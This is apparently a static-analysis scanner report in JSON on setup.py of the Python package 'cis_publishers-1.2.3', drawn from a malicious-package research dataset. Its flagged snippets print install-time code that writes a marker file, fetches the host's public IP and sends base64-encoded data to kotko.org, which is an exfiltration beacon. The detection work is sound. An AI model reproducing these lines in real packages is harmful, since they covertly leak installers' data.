{
  "errors": [],
  "generated_at": "2024-10-03T07:48:38Z",
  "metrics": {
    "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py": {
      "CONFIDENCE.HIGH": 1.0,
      "CONFIDENCE.LOW": 0.0,
      "CONFIDENCE.MEDIUM": 7.0,
      "CONFIDENCE.UNDEFINED": 0.0,
      "SEVERITY.HIGH": 4.0,
      "SEVERITY.LOW": 0.0,
      "SEVERITY.MEDIUM": 4.0,
      "SEVERITY.UNDEFINED": 0.0,
      "loc": 84,
      "nosec": 0
    },
    "_totals": {
      "CONFIDENCE.HIGH": 1.0,
      "CONFIDENCE.LOW": 0.0,
      "CONFIDENCE.MEDIUM": 7.0,
      "CONFIDENCE.UNDEFINED": 0.0,
      "SEVERITY.HIGH": 4.0,
      "SEVERITY.LOW": 0.0,
      "SEVERITY.MEDIUM": 4.0,
      "SEVERITY.UNDEFINED": 0.0,
      "loc": 84,
      "nosec": 0
    }
  },
  "results": [
    {
      "code": "43     f = open(file_name, 'a+')  # open file in append mode\n44     f.write('proof bug by kotko')\n45     f.close()\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "HIGH",
      "issue_text": "os.write",
      "line_number": 44,
      "line_range": [
        44
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b815_write.html",
      "test_id": "B815",
      "test_name": "write"
    },
    {
      "code": "46 \n47     ip = requests.get('https://api.ipify.org').text\n48     ipText = format(ip);\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "HIGH",
      "issue_text": "requests.get",
      "line_number": 47,
      "line_range": [
        47
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b820_get.html",
      "test_id": "B820",
      "test_name": "get"
    },
    {
      "code": "46 \n47     ip = requests.get('https://api.ipify.org').text\n48     ipText = format(ip);\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "MEDIUM",
      "issue_text": "url_found",
      "line_number": 47,
      "line_range": [
        47
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b824_url_found.html",
      "test_id": "B824",
      "test_name": "url_found"
    },
    {
      "code": "58     message_bytes = message.encode('ascii')\n59     base64_bytes = base64.b64encode(message_bytes)\n60     base64_message = base64_bytes.decode('ascii')\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "HIGH",
      "issue_text": "base64.b64encode",
      "line_number": 59,
      "line_range": [
        59
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b802_b64encode.html",
      "test_id": "B802",
      "test_name": "b64encode"
    },
    {
      "code": "58     message_bytes = message.encode('ascii')\n59     base64_bytes = base64.b64encode(message_bytes)\n60     base64_message = base64_bytes.decode('ascii')\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "HIGH",
      "issue_severity": "MEDIUM",
      "issue_text": "base64.b64encode",
      "line_number": 59,
      "line_range": [
        59
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b301-base64-b64encode",
      "test_id": "B301",
      "test_name": "blacklist"
    },
    {
      "code": "61 \n62     r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n63 \n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "HIGH",
      "issue_text": "requests.get",
      "line_number": 62,
      "line_range": [
        62
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b820_get.html",
      "test_id": "B820",
      "test_name": "get"
    },
    {
      "code": "61 \n62     r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n63 \n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "MEDIUM",
      "issue_text": "url_found",
      "line_number": 62,
      "line_range": [
        62
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b824_url_found.html",
      "test_id": "B824",
      "test_name": "url_found"
    },
    {
      "code": "118     # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n119     url='https://github.com/kotko/bravado-decorators',  # Optional\n120 \n121     # This should be your name or the name of the organization which owns the\n122     # project.\n123     author='Vladyslav Kotko',  # Optional\n",
      "filename": "/home/lyvd/panic-at-the-distro-malicious-apks/datasets/dataset1/python/cis_publishers-1.2.3.tar/cis_publishers-1.2.3/setup.py",
      "issue_confidence": "MEDIUM",
      "issue_severity": "MEDIUM",
      "issue_text": "url_found",
      "line_number": 119,
      "line_range": [
        119,
        120,
        121,
        122
      ],
      "more_info": "https://bandit.readthedocs.io/en/latest/plugins/b824_url_found.html",
      "test_id": "B824",
      "test_name": "url_found"
    }
  ]
}